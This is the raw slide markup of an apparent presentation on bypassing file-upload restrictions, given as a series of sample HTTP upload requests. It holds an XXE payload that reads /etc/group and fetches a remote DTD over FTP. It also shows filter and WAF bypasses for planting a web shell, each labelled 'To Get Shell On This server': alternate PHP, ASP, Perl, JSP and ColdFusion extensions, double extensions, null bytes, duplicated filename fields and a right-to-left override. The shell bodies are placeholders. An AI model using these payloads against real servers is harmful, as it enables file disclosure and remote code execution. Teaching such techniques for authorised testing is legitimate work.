              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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With</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poc.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;!ENTITY % int "&lt;!ENTITY &amp;#37; trick SYSTEM 'jar:%payload;.domainwithoutimportance!/'&gt;"&gt; %int; %trick; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get XXE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522" name="Google Shape;522;p64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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/pdf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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" ?&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE root [</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY % payload SYSTEM "file:///etc/group"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY % ext SYSTEM "ftp://me/poc.txt"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%ext;]&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;root&gt;&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p64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24" name="Google Shape;524;p64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64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526" name="Google Shape;526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64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28" name="Google Shape;528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025" y="2675525"/>
            <a:ext cx="4210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5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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PNG IDAT Chunks To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Filters If You Can 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Control The Content Type Header In The Response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534" name="Google Shape;534;p65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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/html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Content Of xsspng.png Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Google Shape;535;p65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36" name="Google Shape;536;p65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65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538" name="Google Shape;538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65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40" name="Google Shape;540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025" y="2675525"/>
            <a:ext cx="4210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65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42" name="Google Shape;542;p6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025" y="3067788"/>
            <a:ext cx="4210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6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PHP Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php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php3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php4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php5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php7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pht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phps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phar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phpt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pgif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phtml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phtm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inc </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Shell On This server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548" name="Google Shape;548;p66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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Google Shape;549;p66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50" name="Google Shape;550;p66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66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552" name="Google Shape;552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66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Payloads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54" name="Google Shape;554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7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Set Multiple Equals With Filename e.g. filename===</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"file.php" </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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To Bypass WAF</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p67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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename==="file.php"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p67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62" name="Google Shape;562;p67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67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564" name="Google Shape;564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67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66" name="Google Shape;566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8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Filename Twice , Once For Unallowed Type And Once For Allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> That Can Be Useful For Bypasses The Restriction</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Google Shape;572;p68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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename="file.jpg" ; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename="file.php" ;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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Google Shape;573;p68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74" name="Google Shape;574;p68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68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576" name="Google Shape;576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68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78" name="Google Shape;578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2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Right-To-Left Override</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , So Rename The Uploaded File e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name.%E2%80%AEphp.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So That will Be name.gpj.php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224" name="Google Shape;224;p42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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name.%E2%80%AEphp.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: application/php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... contents of file here ...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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p42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26" name="Google Shape;226;p42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2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28" name="Google Shape;22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025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42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69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If The Server Is IIS , </a:t>
            </a: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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.aspx;1.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Shell On This server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584" name="Google Shape;584;p69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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/asp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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Google Shape;585;p69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86" name="Google Shape;586;p69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69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588" name="Google Shape;588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69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Payloads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90" name="Google Shape;590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70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Perl Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pl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pm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cgi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lib </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Shell On This server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596" name="Google Shape;596;p70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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.pl</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/pl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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p70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98" name="Google Shape;598;p70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70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600" name="Google Shape;600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70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Payloads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02" name="Google Shape;602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71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Jsp Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jsp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jspx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jsw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jsv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jspf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To Get Shell On This server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608" name="Google Shape;608;p71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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/jsp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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Google Shape;609;p71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10" name="Google Shape;610;p71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71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612" name="Google Shape;612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p71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Payloads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14" name="Google Shape;614;p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72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Coldfusion Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cfm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cfml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cfc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dbm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To Get Shell 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On This server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620" name="Google Shape;620;p72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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.cfm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/cfm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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Google Shape;621;p72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22" name="Google Shape;622;p72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72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624" name="Google Shape;624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Google Shape;625;p72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Payloads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26" name="Google Shape;626;p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73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Double Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.jpg.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR Reverse Double Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Shell On This server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632" name="Google Shape;632;p73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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.jpg.php</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Google Shape;633;p73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34" name="Google Shape;634;p73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73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636" name="Google Shape;636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73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Payloads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38" name="Google Shape;638;p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74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Null byte With Double Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php%00.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php\x00.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Get Shell On This server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644" name="Google Shape;644;p74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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
